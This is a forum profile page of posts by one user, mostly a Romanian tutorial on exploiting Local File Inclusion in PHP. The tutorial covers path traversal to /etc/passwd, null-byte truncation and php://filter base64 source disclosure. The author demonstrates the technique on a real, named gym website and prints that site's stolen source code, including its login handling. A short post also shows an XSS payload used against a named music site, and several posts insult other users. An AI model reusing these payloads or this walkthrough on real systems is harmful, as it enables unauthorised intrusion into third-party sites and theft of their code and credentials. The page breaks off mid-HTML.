Jump to content

dancezar

Active Members
 View Profile  See their activity

  • Posts

    981

  • Joined

  • Last visited

  • Days Won

    20

 Content Type 

Everything posted by dancezar

  1. dancezar
    Caut si eu o jucarie de asta (SH),astept si eu pm:D
  2. dancezar
    3 days to add a fucking (? the single quote was there but you are blind. Bucura-te de sederea pe rst presimt ca in maxim 2 ore faci tu ceva si iei ban //sa inchida cineva topicul // edit: done
  3. dancezar
    after one minute,and you are still stupid View image: asda //este si ultima versiune de chrome
  4. dancezar
    MusicSRC.com | \' Onerror =alert(1) Asd= Artists & Albums' Why your fucking bypass shit is so challenging? Haxoru puli care te crezi tu
  5. dancezar
    Daca ii sterge contu poate ajunge ca asta
  6. dancezar
    Si eu am avut un coleg de clasa tot asa disperat de SAMP.Juca toata ziua samp si lipsea foarte mult de la scoala.Cand parinti lui veneau de la munca pe la 4-6 in pauza de masa ,pleca si el la scoala (sarea pe geam de la etajul unu da nui bai).Leacul lui au fost parintii.Un colog de clasa a vorbit cu tatal lui si cand a aflat a venit la scola sa se convinga.Colegutul disperat de SAMP a fost batut de tacsu de l-a stins (tacsu era pompier) si nu i-a mai trebuit sammp de atunci
  7. dancezar
    In acest tutorial veti invata metoda php://filter pentru a exploata un LFI. Ce este LFI: Lfi sau Local file inclusion presupune folosirea functiei inlclude din php intr-un mod necorespunzator,astfel prin LFI putem include(nu prelua pagina sursa) si executa codul php de pe orice pagina de pe server. Cum gasim un LFI: LFI apare deobicei sub forma aceasta site.com/index.php?page=ceva.php daca vom introduce dupa site.com/index.php?page=ceva.php; vom obtine o eroare de genul: http://s24.postimg.org/u93f51bth/lfi2.png Eroarea spune ca php nu poate include un fisier care nu exista.Folosindune de ../(un director inapoi) putem naviga prin foldere si include orice fisier de pe server site.com/index.php?page=../etc/passwd Folosirea caracterului null byte: Se foloseste atunci cand scriptul php pune dupa parametrul preluat, o extesie (de obicei .php .hrml .txt) .Caracterul null byte %00 "anuleaza" extesia care se afla dupa parametru si se foloseste astfel site.com/index.php?page=../etc/passwd%00 Acum ca am facut o scurta introductie aspra termenului LFI am sa prezint in continuare metoda php://filter. Sa presupunem ca aveti un LFI intr-un site puteti scoate /etc/passwd dar nu puteti gasi nici un log file ,iar metoda php://input nu functioneaza.Mai ramane inca o metoda de a exploata un LFI metoda php://filter. Cu aceasta metoda putem transforma un LFI intr-un Souce code discloure adica putem citi paginile sursa a fisierelor de pe server. Avem urmatorul LFI site.com/index.php?page=../etc/passwd http://s9.postimg.org/ipogmj0gf/lfi1.png Sa presupunem ca nu avem acces la loguri si nu putem transforma LFI in Remote code execution,vom incerca sa testam metoda php://filter . Metoda php://filter se foloseste astfel:site.com/index.php?page=php://filter/convert.base64-encode/resource=FISIER Unde FISIER este numele fisierul care vreti sa il cititi.Ce face instructiunea php://filter/convert.base64-encode/resource=FISIER?Pai ii spune functiei include sa preia continutul pagini FISIERsa il encodeze in base64 si sa il afiseze.Aceasta intructiune functionaza doar pe scripturile care folosesc ca metoda de intrare functia include si doar cele care nu au altceva in fata dupa parametrul injectie( ca de exemplu include('pages'.$_REQUEST['page']). Rezultatul v-a fi urmatorul eu am citit chiar fisierul index.php: http://s24.postimg.org/hx9pj12qd/lfi3.png In pagina ni se v-a furniza continutul pagini sursa encodat in base64 si cu ajutorul unui decodor putem obtine continutul pagini sursa. Aplicabilitate: Ce se poate face cu aceasta metoda:-/ Pai putem lua acces la datele de logare de la panouri de administrare sau de la baze de date. Avem urmatorul site:Sportstudio Bodyworld Schkeuditz bei Leipzig http://s23.postimg.org/ta0365agb/lfi4.png Vom testa metoda php://filter si vom citi pagina sursa a index.php: Sportstudio Bodyworld Schkeuditz bei Leipzig http://s21.postimg.org/x2fgrchg7/lfi5.png Ce am obtinut este: PD9waHANCiAgaW5jbHVkZSgidXNlci5waHAiKTsNCiAgJFBIUFNFU1NJRCA9ICRfUkVRVUVTVFsiUEhQU0VTU0lEIl07DQogICRwYWdlID0gJF9SRVFVRVNUWyJwYWdlIl07IA0KICAkYmVudXR6ZXJuYW1lID0gJF9SRVFVRVNUWyJiZW51dHplcm5hbWUiXTsNCiAgJHBhc3N3b3J0ID0gJF9SRVFVRVNUWyJwYXNzd29ydCJdOw0KICAkbG9naW4gPSAkX1JFUVVFU1RbImxvZ2luIl07DQogICRsb2dvdXQgPSAkX1JFUVVFU1RbImxvZ291dCJdOw0KICAkc2VuZGVuID0gJF9SRVFVRVNUWyJzZW5kZW4iXTsNCiAgJGRhdGVpID0gJF9SRVFVRVNUWyJkYXRlaSJdOw0KICANCiAgSWYgKCRiZW51dHplcm5hbWUgJiYgJHBhc3N3b3J0KQ0KICAgIElmICgkYmVudXR6ZXJuYW1lID09PSAkdXNlciAmJiAkcGFzc3dvcnQgPT09ICRwYXNzKSB7DQogICAgICBzZXNzaW9uX3N0YXJ0KCk7DQogICAgICBoZWFkZXIoIkxvY2F0aW9uOiBpbmRleC5waHA/cGFnZT1sb2dpbi5waHAmbG9naW49b2siKTsNCiAgICB9DQogICAgZWxzZSB7DQogICAgICBoZWFkZXIoIkxvY2F0aW9uOiBpbmRleC5waHA/cGFnZT1sb2dpbi5waHAmbG9naW49ZmFsc2NoIik7DQogICAgfQ0KICBlbHNlIHsNCiAgICBJZiAoJFBIUFNFU1NJRCkgew0KICAgICAgc2Vzc2lvbl9zdGFydCgkUEhQU0VTU0lEKTsNCiAgICB9DQogIH0NCiAgSWYgKCRzZW5kZW4pIHsNCiAgICBJZiAoJHNlbmRlbj09IkphIikgew0KICAgICAgJGJpbGQgPSAkX1JFUVVFU1RbImJpbGQiXTsNCiAgICAgIElmICgkYmlsZCkgew0KICAgICAgICBAdW5saW5rKCIuL25ld3NfcGljcy8kYmlsZCIpOw0KICAgICAgfQ0KICAgICAgQHVubGluaygkZGF0ZWkpOw0KICAgICAgaGVhZGVyKCJMb2NhdGlvbjogaW5kZXgucGhwP3BhZ2U9bmV3c19sb2VzY2hlbi5waHAmYW50dz0kc2VuZGVuJmRhdGVpPSRkYXRlaSIpOw0KICAgIH0NCiAgICBlbHNlaWYgKCRzZW5kZW49PSJOZWluIikgew0KICAgICAgaGVhZGVyKCJMb2NhdGlvbjogaW5kZXgucGhwP3BhZ2U9bmV3c19sb2VzY2hlbi5waHAmYW50dz0kc2VuZGVuJmRhdGVpPSRkYXRlaSIpOw0KICAgIH0NCiAgfQ0KICANCj8+DQoNCjwhRE9DVFlQRSBIVE1MIFBVQkxJQyAiLS8vVzNDLy9EVEQgSFRNTCA0LjAxIFRyYW5zaXRpb25hbC8vRU4iPg0KPGh0bWw+DQo8aGVhZD4NCgk8dGl0bGU+U3BvcnRzdHVkaW8gQm9keXdvcmxkIFNjaGtldWRpdHogYmVpIExlaXB6aWc8L3RpdGxlPg0KCTxtZXRhIG5hbWU9IkRDLlRpdGxlIiBjb250ZW50PSJwYzR1c2VyLmRlIC0gd2ViZGVzaWduIC0gd2VidGVjIj4NCjxtZXRhIG5hbWU9IkRDLkNyZWF0b3IiIGNvbnRlbnQ9IkRldGxldiBMaWViaW5nIj4NCjxtZXRhIG5hbWU9IkRDLlN1YmplY3QiIGNvbnRlbnQ9IlNwb3J0LCBGaXRuZXNzLCBGaXRuZXNzLVN0dWRpbywgRnJlaXplaXQsIFNvbGFyaXVtLCBTYXVuYSwgQm9keXdvcmxkLCBTcG9ydHN0dWRpbyI+DQo8bWV0YSBuYW1lPSJEQy5EZXNjcmlwdGlvbiIgICBjb250ZW50PSJwYzR1c2VyLmRlIC0gd2ViZGVzaWduIC0gd2VidGVjIj4NCjxtZXRhIG5hbWU9IkRDLlB1Ymxpc2hlciIgY29udGVudD0icGM0dXNlciI+DQo8bWV0YSBuYW1lPSJEQy5Db250cmlidXRvciIgY29udGVudD0iRGV0bGV2IExpZWJpbmciPg0KPG1ldGEgbmFtZT0iREMuRGF0ZSIgY29udGVudD0iMjAwOS0wMS0xNSI+DQo8bWV0YSBuYW1lPSJEQy5UeXBlIiBjb250ZW50PSJUZXh0Ij4NCjxtZXRhIG5hbWU9IkRDLkZvcm1hdCIgY29udGVudD0idGV4dC9odG1sIj4NCjxtZXRhIG5hbWU9IkRDLklkZW50aWZpZXIiIGNvbnRlbnQ9Imh0dHA6Ly93d3cucGM0dXNlci5kZSI+DQo8bWV0YSBuYW1lPSJEQy5Tb3VyY2UiIGNvbnRlbnQ9IiI+DQo8bWV0YSBuYW1lPSJEQy5MYW5ndWFnZSIgY29udGVudD0iZGUiPg0KPG1ldGEgbmFtZT0iREMuUmVsYXRpb24iIGNvbnRlbnQ9IlN0YXJ0c2VpdGUiPg0KPG1ldGEgbmFtZT0iREMuQ292ZXJhZ2UiIGNvbnRlbnQ9IkxlaXB6aWciPg0KPG1ldGEgbmFtZT0iREMuUmlnaHRzIiBjb250ZW50PSJBbGxlIFJlY2h0ZSBsaWVnZW4gYmVpIHBjNHVzZXItRGV0bGV2IExpZWJpbmciPg0KPG1ldGEgbmFtZT0icm9ib3RzIiBjb250ZW50PSJpbmRleCI+DQo8bWV0YSBuYW1lPSJyb2JvdHMiIGNvbnRlbnQ9ImZvbGxvdyI+DQo8bWV0YSBuYW1lPSJrZXl3b3JkcyIgbGFuZz0iZGUiIGNvbnRlbnQ9IiI+DQo8bWV0YSBuYW1lPSJrZXl3b3JkcyIgbGFuZz0iZW4tdXMiIGNvbnRlbnQ9IiI+DQo8bWV0YSBuYW1lPSJrZXl3b3JkcyIgbGFuZz0iZW4iICBjb250ZW50PSIiPg0KPG1ldGEgaHR0cC1lcXVpdj0iY29udGVudC10eXBlIiBjb250ZW50PSJ0ZXh0L2h0bWw7IGNoYXJzZXQ9SVNPLTg4NTktMSI+DQo8bWV0YSBodHRwLWVxdWl2PSJDb250ZW50LVNjcmlwdC1UeXBlIiBjb250ZW50PSJ0ZXh0L2phdmFzY3JpcHQiPg0KPG1ldGEgaHR0cC1lcXVpdj0iQ29udGVudC1TdHlsZS1UeXBlIiBjb250ZW50PSJ0ZXh0L2NzcyI+DQo8bWV0YSBodHRwLWVxdWl2PSJleHBpcmVzIiBjb250ZW50PSIwIj4NCjxsaW5rIHJlbD0ic3R5bGVzaGVldCIgaHJlZj0ic3R5bGUuY3NzIj4NCjwvaGVhZD4NCg0KPGJvZHkgdG9wbWFyZ2luPTAgbGVmdG1hcmdpbj0wIHJpZ2h0bWFyZ2luPTAgYm90dG9tbWFyZ2luPTA+DQoJPHRhYmxlIHdpZHRoPTk5MCBjZWxsc3BhY2luZz0wIGNlbGxwYWRkaW5nPTAgYm9yZGVyPTAgYWxpZ249bGVmdD4NCgkJPHRyPg0KCQkJPHRkIHdpZHRoPTk5MCBoZWlnaHQ9MjM5Pg0KCQkJCTx0YWJsZSB3aWR0aD05OTAgY2VsbHNwYWNpbmc9MCBjZWxscGFkZGluZz0wIGJvcmRlcj0wIGFsaWduPWxlZnQ+DQoJCQkJCTx0cj4NCgkJCQkJCTx0ZCB3aWR0aD05OTAgaGVpZ2h0PTMzIGNvbHNwYW49Mj4NCgkJCQkJCQk8IS0tLSBob3Jpem9udGFsZSBvYmVyc3RlIGhhdXB0bmF2aWdhdGlvbi0tLT4NCgkJCQkJCQk8dGFibGUgd2lkdGg9OTkwIGNlbGxzcGFjaW5nPTAgY2VsbHBhZGRpbmc9MCBib3JkZXI9MCBhbGlnbj1sZWZ0Pg0KCQkJCQkJCQk8dHI+DQoJCQkJCQkJCQk8dGQgd2lkdGg9MTUwIGhlaWdodD0zMz48YSBocmVmPSJpbmRleC5waHA/cGFnZT1ob21lLnBocCI+PGltZyBzcmM9ImdmeC9ibGF1LmpwZyIgYWx0PSIiIHdpZHRoPSIxNTAiIGhlaWdodD0iMzMiIGJvcmRlcj0iMCI+PC9hPjwvdGQ+DQoJCQkJCQkJCQk8dGQgd2lkdGg9ODQgaGVpZ2h0PTMzPjxhIGhyZWY9ImluZGV4LnBocD9wYWdlPWhvbWUucGhwIj48aW1nIHNyYz0iZ2Z4L2JsYXUuanBnIiBhbHQ9IiIgd2lkdGg9Ijg0IiBoZWlnaHQ9IjMzIiBib3JkZXI9IjAiPjwvYT48L3RkPg0KCQkJCQkJCQkJPHRkIHdpZHRoPTExMSBoZWlnaHQ9MzM+PGEgaHJlZj0iaW5kZXgucGhwP3BhZ2U9aG9tZS5waHAiPjxpbWcgc3JjPSJnZngvYmxhdS5qcGciIGFsdD0iIiB3aWR0aD0iMTExIiBoZWlnaHQ9IjMzIiBib3JkZXI9IjAiPjwvYT48L3RkPg0KCQkJCQkJCQkJPHRkIHdpZHRoPSI2NDciIGJhY2tncm91bmQ9ImdmeC9vZWZmbnVuZ3N6ZWl0ZW4uanBnIj4mbmJzcDs8L3RkPg0KCQkJCQkJCQk8L3RyPg0KCQkJCQkJCTwvdGFibGU+DQoJCQkJCQk8L3RkPg0KCQkJCQk8L3RyPg0KCQkJCQk8dHI+DQoJCQkJCQk8dGQgd2lkdGg9NTYzIGhlaWdodD0yMDYgYmFja2dyb3VuZD0iZ2Z4L21pdHRlbGhlYWRlcmxpbmtzLmpwZyIgdmFsaWduPXRvcD4NCgkJCQkJCQk8dGFibGUgd2lkdGg9NTYzIGNlbGxzcGFjaW5nPTAgY2VsbHBhZGRpbmc9MCBib3JkZXI9MCBhbGlnbj1sZWZ0Pg0KCQkJCQkJCQkJPHRyPg0KCQkJCQkJCQkJPHRkIHJvd3NwYW49NCB3aWR0aD00NDMgaGVpZ2h0PTE3MD4mbmJzcDs8L3RkPg0KCQkJCQkJCQkJPHRkIHdpZHRoPTEyMCBoZWlnaHQ9Nzk+Jm5ic3A7PC90ZD4NCgkJCQkJCQkJPC90cj4NCgkJCQkJCQkJPHRyPg0KCQkJCQkJCQkJPHRkIHdpZHRoPTEyMD48YSBocmVmPSJpbmRleC5waHA/cGFnZT1ob21lLnBocCI+PGltZyBzcmM9ImdmeC9zZXJ2aWNlLmdpZiIgYWx0PSIiIHdpZHRoPSIxMjEiIGhlaWdodD0iMjMiIGJvcmRlcj0iMCI+PC9hPjwvdGQ+DQoJCQkJCQkJCTwvdHI+DQoJCQkJCQkJCTx0cj4NCgkJCQkJCQkJCTx0ZCB3aWR0aD0xMjA+PGEgaHJlZj0iaW5kZXgucGhwP3BhZ2U9c2VydmljZS5waHAiPjxpbWcgc3JjPSJnZngvc2VydmljZS5naWYiIGFsdD0iIiB3aWR0aD0iMTIxIiBoZWlnaHQ9IjMyIiBib3JkZXI9IjAiPjwvYT48L3RkPg0KCQkJCQkJCQk8L3RyPg0KCQkJCQkJCQk8dHI+PHRkIHdpZHRoPTEyMD48YSBocmVmPSJpbmRleC5waHA/cGFnZT1rb250YWt0ZS5waHAiPjxpbWcgc3JjPSJnZngva29udGFrdGUuZ2lmIiBhbHQ9IiIgd2lkdGg9IjEyMSIgaGVpZ2h0PSIzNiIgYm9yZGVyPSIwIj48L2E+PC90ZD4NCgkJCQkJCQkgIDwvdHI+DQoJCQkJCQkJCTx0cj4NCgkJCQkJCQkJCTx0ZCBjb2xzcGFuPTIgd2lkdGg9NTYzIGhlaWdodD0zNj4NCgkJCQkJCQkJCTwhLS0gdW50ZXJlIGhvcml6b250YWxlIGhhdXB0bmF2aS0tPg0KCQkJCQkJCQkJCTx0YWJsZSB3aWR0aD01NjMgY2VsbHNwYWNpbmc9MCBjZWxscGFkZGluZz0wIGJvcmRlcj0wIGFsaWduPWxlZnQ+DQoJCQkJCQkJCQkJCTx0cj4NCgkJCQkJCQkJCQkJCTx0ZCB3aWR0aD0xMTA+PGEgaHJlZj0iaW5kZXgucGhwP3BhZ2U9aG9tZS5waHAiPjxpbWcgc3JjPSJnZngvaG9tZS5naWYiIGFsdD0iIiB3aWR0aD0iNzIiIGhlaWdodD0iMzYiIGJvcmRlcj0iMCI+PC9hPjwvdGQ+DQoJCQkJCQkJCQkJCQk8dGQgd3VpZHRoPTcyPjxhIGhyZWY9ImluZGV4LnBocD9wYWdlPWFuZmFocnQucGhwIj48aW1nIHNyYz0iZ2Z4L2FuZmFocnQuZ2lmIiBhbHQ9IiIgd2lkdGg9IjExMCIgaGVpZ2h0PSIzNiIgYm9yZGVyPSIwIj48L2E+PC90ZD4NCgkJCQkJCQkJCQkJCTx0ZCB3aWR0aD0xMjc+PGEgaHJlZj0iaW5kZXgucGhwP3BhZ2U9YW5nZWJvdC5waHAiPjxpbWcgc3JjPSJnZngvYW5nZWJvdC5naWYiIGFsdD0iIiB3aWR0aD0iMTE1IiBoZWlnaHQ9IjM2IiBib3JkZXI9IjAiPjwvYT48L3RkPg0KCQkJCQkJCQkJCQkJPHRkIHdpZHRoPTE0MD48YSBocmVmPSJpbmRleC5waHA/cGFnZT1rb250YWt0LnBocCI+PGltZyBzcmM9ImdmeC9rb250YWt0LmdpZiIgYWx0PSIiIHdpZHRoPSIxMjciIGhlaWdodD0iMzYiIGJvcmRlcj0iMCI+PC9hPjwvdGQ+DQoJCQkJCQkJCQkJCQk8dGQgd2lkdGg9MTE1PjxhIGhyZWY9ImluZGV4LnBocD9wYWdlPWltcHJlc3N1bS5waHAiPjxpbWcgc3JjPSJnZngvaW1wcmVzc3VtLmdpZiIgYWx0PSIiIHdpZHRoPSIxNDAiIGhlaWdodD0iMzYiIGJvcmRlcj0iMCI+PC9hPjwvdGQ+DQoJCQkJCQkJCQkJCTwvdHI+DQoJCQkJCQkJCSAgPC90YWJsZT4JCQkJCQkJCQk8L3RkPg0KCQkJCQkJCQk8L3RyPg0KCQkJCQkJCTwvdGFibGU+DQoJCQkJCSAgPC90ZD4NCgkJCQkJCTwhLS0gcmVjaHRlciBoZWFkZXJ0ZWlsIG1pdHRlIChsb2dvKS0tPg0KCQkJCQkJPHRkIHdpZHRoPTQyNyBoZWlnaHQ9MjA2IGJhY2tncm91bmQ9ImdmeC9taXR0ZWxoZWFkZXJyZWNodHMuanBnIj4mbmJzcDs8L3RkPg0KCQkJCQk8L3RyPg0KCQkJCTwvdGFibGU+DQoJCQk8L3RkPg0KCQk8L3RyPg0KCQk8dHI+DQoJCQk8dGQgaGVpZ2h0PTcxIHdpZHRoPTk5MCBzdHlsZT0iYmFja2dyb3VuZC1pbWFnZTp1cmwoZ2Z4L3VudGVyaGVhZGVyLmpwZyk7IGJhY2tncm91bmQtcmVwZWF0Om5vLXJlcGVhdCIgdmFsaWduPXRvcD4NCgkJCQk8dGFibGUgd2lkdGg9OTkwIGNlbGxzcGFjaW5nPTAgY2VsbHBhZGRpbmc9MCBib3JkZXI9MCBhbGlnbj1sZWZ0Pg0KCQkJCQk8dHI+DQoJCQkJCQk8IS0tIG5ld3NoZWFkZXIgLS0tPg0KCQkJCQkJPHRkIHdpZHRoPTQwMCBoZWlnaHQ9NzEgdmFsaWduPSJib3R0b20iPg0KICAgICAgICAgICAgICA8dGFibGUgaWQ9InVlYmVyIj4NCiAgICAgICAgICAgICAgICA8dHI+DQogICAgICAgICAgICAgICAgICA8dGQgd2lkdGg9MTkwPg0KICAgICAgICAgICAgICAgICAgPC90ZD4NCiAgICAgICAgICAgICAgICAgIDx0ZCB3aWR0aD0yMTA+DQogICAgICAgICAgICAgICAgICAgIE5ld3MNCiAgICAgICAgICAgICAgICAgIDwvdGQ+DQogICAgICAgICAgICAgICAgPC90cj4NCiAgICAgICAgICAgICAgPC90YWJsZT4NCiAgICAgICAgICAgIDwvdGQ+DQoJCQkJCQk8IS0tIHVlYmVyc2NocmlmdCBkZXMgamV3ZWlsaWdlbiBpbmhhbHRlcyAtLT4NCgkJCQkJCTx0ZCB3aWR0aD01OTAgYWxpZ249ImxlZnQiIHZhbGlnbj0iYm90dG9tIj4NCiAgICAgICAgICAgICAgPHRhYmxlIGlkPSJ1ZWJlciI+DQogICAgICAgICAgICAgICAgPHRyPg0KICAgICAgICAgICAgICAgICAgPHRkIHdpZHRoPTMwPg0KICAgICAgICAgICAgICAgICAgPC90ZD4NCiAgICAgICAgICAgICAgICAgIDx0ZCB3aWR0aD01NjA+DQogICAgICAgICAgICAgICAgICAgIDw/cGhwIA0KICAgICAgICAgICAgICAgICAgICAgIGluY2x1ZGUoInVlYmVyc2NocmlmdGVuLnBocCIpOw0KICAgICAgICAgICAgICAgICAgICA/Pg0KICAgICAgICAgICAgICAgICAgPC90ZD4NCiAgICAgICAgICAgICAgICA8L3RyPg0KICAgICAgICAgICAgICA8L3RhYmxlPg0KICAgICAgICAgICAgPC90ZD4NCgkJCQkJPC90cj4NCgkJCQkJPHRyPg0KCQkJCQkJPCEtLSBuZXdzIC0tLT4NCgkJCQkJCTx0ZCB3aWR0aD00MDAgdmFsaWduPSJ0b3AiPg0KCQkJCQkJPCEtLSBhbiBkaWVzZXIgc3RlbGxlIHBocCBhdXMgZGF0ZW5iYW5rLS0+DQoJCQkJCQkgIDx0YWJsZT4NCiAgICAgICAgICAgICAgICA8dHI+DQogICAgICAgICAgICAgICAgICA8dGQgdmFsaWduPSJ0b3AiPg0KICAgICAgICAgICAgICAgICAgICA8P3BocCBpbmNsdWRlKCJuZXdzLnBocCIpID8+DQogICAgICAgICAgICAgICAgICA8L3RkPg0KICAgICAgICAgICAgICAgIDwvdHI+DQogICAgICAgICAgICAgIDwvdGFibGU+DQoJCQkJCQk8L3RkPg0KCQkJCQkJPCEtLSAgamV3ZWlsaWdlciBpbmhhbHQgLS0+DQoJCQkJCQk8dGQgd2lkdGg9NTkwIHZhbGlnbj0idG9wIj4NCgkJCQkJCSAgPHRhYmxlIHdpZHRoPTU5MCBpZD0ibWFpbiI+DQogICAgICAgICAgICAgICAgPHRyPg0KICAgICAgICAgICAgICAgICAgPHRkIHdpZHRoPTQ1PiZuYnNwOw0KICAgICAgICAgICAgICAgICAgICANCiAgICAgICAgICAgICAgICAgIDwvdGQ+DQogICAgICAgICAgICAgICAgICA8dGQgdmFsaWduPSJ0b3AiIHdpZHRoPTU2MD4NCiAgICAgICAgICAgICAgICAgICAgPD9waHAgDQogICAgICAgICAgICAgICAgICAgICAgSWYgKHN0cnBvcygkX1JFUVVFU1RbInBhZ2UiXSwgImh0dHAiKSA9PT0gMCB8fCBzdHJwb3MoJF9SRVFVRVNUWyJwYWdlIl0sICJodHRwIikgPiAwKSB7ICRwYWdlPSJob21lLnBocCI7IH07DQogICAgICAgICAgICAgICAgICAgICAgSWYgKHN0cnBvcygkX1JFUVVFU1RbInBhZ2UiXSwgInd3dyIpID09PSAwIHx8IHN0cnBvcygkX1JFUVVFU1RbInBhZ2UiXSwgInd3dyIpID4gMCkgeyAkcGFnZT0iaG9tZS5waHAiOyB9Ow0KICAgICAgICAgICAgICAgICAgICAgIElmIChzdHJwb3MoJF9SRVFVRVNUWyJwYWdlIl0sICJmdHAiKSA9PT0gMCB8fCBzdHJwb3MoJF9SRVFVRVNUWyJwYWdlIl0sICJmdHAiKSA+IDApIHsgJHBhZ2U9ImhvbWUucGhwIjsgfTsNCiAgICAgICAgICAgICAgICAgICAgICBJZiAoJHBhZ2UpIHsgaW5jbHVkZSgkcGFnZSk7IH0NCiAgICAgICAgICAgICAgICAgICAgICBlbHNlIHsgaW5jbHVkZSgiaG9tZS5waHAiKTsgfQ0KICAgICAgICAgICAgICAgICAgICA/Pg0KICAgICAgICAgICAgICAgICAgPC90ZD4NCiAgICAgICAgICAgICAgICA8L3RyPg0KICAgICAgICAgICAgICA8L3RhYmxlPg0KCQkJCQkJPC90ZD4NCgkJCQkJPC90cj4NCgkJCQk8L3RhYmxlPg0KCQkJPC90ZD4NCgkJPC90cj4NCgkJPCEtLS0gZm9vdGVyLS0tPg0KCQk8dHI+DQoJCQk8dGQgd2lkdGg9OTkwIGhlaWdodD02MD4NCgkJCQk8dGFibGUgd2lkdGg9OTkwIGNlbGxzcGFjaW5nPTAgY2VsbHBhZGRpbmc9MCBib3JkZXI9MCBhbGlnbj1sZWZ0IGJhY2tncm91bmQ9ImdmeC9mb290ZXIuanBnIj4NCgkJCQkJPHRyPg0KICAgICAgICAgICAgPHRkIHdpZHRoPTMwPg0KICAgICAgICAgICAgICA8ZGl2IGFsaWduPSJqdXN0aWZ5Ij48L2Rpdj48L3RkPg0KICAgICAgICAgIDw/cGhwDQogICAgICAgICAgSWYgKCRQSFBTRVNTSUQpIHsNCiAgICAgICAgICAgIGVjaG8gIg0KICAgICAgICAgICAgPHRkIHdpZHRoPTg1MCBoZWlnaHQ9NjMgdmFsaWduPVwibWlkZGxlXCIgYWxpZ249XCJsZWZ0XCI+DQogIAkJCQkgICAgPGEgaHJlZj1cImxvZ291dC5waHBcIiBjbGFzcz1hZG1pbj5Mb2dvdXQ8L2E+DQoJCQkJCQk8L3RkPiI7DQogICAgICAgICAgfQ0KICAgICAgICAgIGVsc2Ugew0KICAgICAgICAgICAgZWNobyAiDQoJCQkJCQk8dGQgd2lkdGg9OTYwIGhlaWdodD02MyB2YWxpZ249XCJtaWRkbGVcIj4NCiAgCQkJCSAgICA8YSBocmVmPVwiaW5kZXgucGhwP3BhZ2U9aG9tZS5waHBcIj5Ib21lPC9hPg0KCQkJCQkJPC90ZD4iOw0KICAgICAgICAgIH0NCiAgICAgICAgICA/Pg0KCQkJCQk8L3RyPg0KCQkJCTwvdGFibGU+DQoJCQk8L3RkPg0KCQk8L3RyPg0KCTwvdGFibGU+DQo8L2JvZHk+DQo8L2h0bWw+ Decodat este: <?php include("user.php"); $PHPSESSID = $_REQUEST["PHPSESSID"]; $page = $_REQUEST["page"]; $benutzername = $_REQUEST["benutzername"]; $passwort = $_REQUEST["passwort"]; $login = $_REQUEST["login"]; $logout = $_REQUEST["logout"]; $senden = $_REQUEST["senden"]; $datei = $_REQUEST["datei"]; If ($benutzername && $passwort) If ($benutzername === $user && $passwort === $pass) { session_start(); header("Location: index.php?page=login.php&login=ok"); } else { header("Location: index.php?page=login.php&login=falsch"); } else { If ($PHPSESSID) { session_start($PHPSESSID); } } If ($senden) { If ($senden=="Ja") { $bild = $_REQUEST["bild"]; If ($bild) { @unlink("./news_pics/$bild"); } @unlink($datei); header("Location: index.php?page=news_loeschen.php&antw=$senden&datei=$datei"); } elseif ($senden=="Nein") { header("Location: index.php?page=news_loeschen.php&antw=$senden&datei=$datei"); } } ?> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>Sportstudio Bodyworld Schkeuditz bei Leipzig</title> <meta name="DC.Title" content="pc4user.de - webdesign - webtec"> <meta name="DC.Creator" content="Detlev Liebing"> <meta name="DC.Subject" content="Sport, Fitness, Fitness-Studio, Freizeit, Solarium, Sauna, Bodyworld, Sportstudio"> <meta name="DC.Description" content="pc4user.de - webdesign - webtec"> <meta name="DC.Publisher" content="pc4user"> <meta name="DC.Contributor" content="Detlev Liebing"> <meta name="DC.Date" content="2009-01-15"> <meta name="DC.Type" content="Text"> <meta name="DC.Format" content="text/html"> <meta name="DC.Identifier" content="http://www.pc4user.de"> <meta name="DC.Source" content=""> <meta name="DC.Language" content="de"> <meta name="DC.Relation" content="Startseite"> <meta name="DC.Coverage" content="Leipzig"> <meta name="DC.Rights" content="Alle Rechte liegen bei pc4user-Detlev Liebing"> <meta name="robots" content="index"> <meta name="robots" content="follow"> <meta name="keywords" lang="de" content=""> <meta name="keywords" lang="en-us" content=""> <meta name="keywords" lang="en" content=""> <meta http-equiv="content-type" content="text/html; charset=ISO-8859-1"> <meta http-equiv="Content-Script-Type" content="text/javascript"> <meta http-equiv="Content-Style-Type" content="text/css"> <meta http-equiv="expires" content="0"> <link rel="stylesheet" href="style.css"> </head> <body topmargin=0 leftmargin=0 rightmargin=0 bottommargin=0> <table width=990 cellspacing=0 cellpadding=0 border=0 align=left> <tr> <td width=990 height=239> <table width=990 cellspacing=0 cellpadding=0 border=0 align=left> <tr> <td width=990 height=33 colspan=2> <!--- horizontale oberste hauptnavigation---> <table width=990 cellspacing=0 cellpadding=0 border=0 align=left> <tr> <td width=150 height=33><a href="index.php?page=home.php"><img src="gfx/blau.jpg" alt="" width="150" height="33" border="0"></a></td> <td width=84 height=33><a href="index.php?page=home.php"><img src="gfx/blau.jpg" alt="" width="84" height="33" border="0"></a></td> <td width=111 height=33><a href="index.php?page=home.php"><img src="gfx/blau.jpg" alt="" width="111" height="33" border="0"></a></td> <td width="647" background="gfx/oeffnungszeiten.jpg"> </td> </tr> </table> </td> </tr> <tr> <td width=563 height=206 background="gfx/mittelheaderlinks.jpg" valign=top> <table width=563 cellspacing=0 cellpadding=0 border=0 align=left> <tr> <td rowspan=4 width=443 height=170> </td> <td width=120 height=79> </td> </tr> <tr> <td width=120><a href="index.php?page=home.php"><img src="gfx/service.gif" alt="" width="121" height="23" border="0"></a></td> </tr> <tr> <td width=120><a href="index.php?page=service.php"><img src="gfx/service.gif" alt="" width="121" height="32" border="0"></a></td> </tr> <tr><td width=120><a href="index.php?page=kontakte.php"><img src="gfx/kontakte.gif" alt="" width="121" height="36" border="0"></a></td> </tr> <tr> <td colspan=2 width=563 height=36> <!-- untere horizontale hauptnavi--> <table width=563 cellspacing=0 cellpadding=0 border=0 align=left> <tr> <td width=110><a href="index.php?page=home.php"><img src="gfx/home.gif" alt="" width="72" height="36" border="0"></a></td> <td wuidth=72><a href="index.php?page=anfahrt.php"><img src="gfx/anfahrt.gif" alt="" width="110" height="36" border="0"></a></td> <td width=127><a href="index.php?page=angebot.php"><img src="gfx/angebot.gif" alt="" width="115" height="36" border="0"></a></td> <td width=140><a href="index.php?page=kontakt.php"><img src="gfx/kontakt.gif" alt="" width="127" height="36" border="0"></a></td> <td width=115><a href="index.php?page=impressum.php"><img src="gfx/impressum.gif" alt="" width="140" height="36" border="0"></a></td> </tr> </table> </td> </tr> </table> </td> <!-- rechter headerteil mitte (logo)--> <td width=427 height=206 background="gfx/mittelheaderrechts.jpg"> </td> </tr> </table> </td> </tr> <tr> <td height=71 width=990 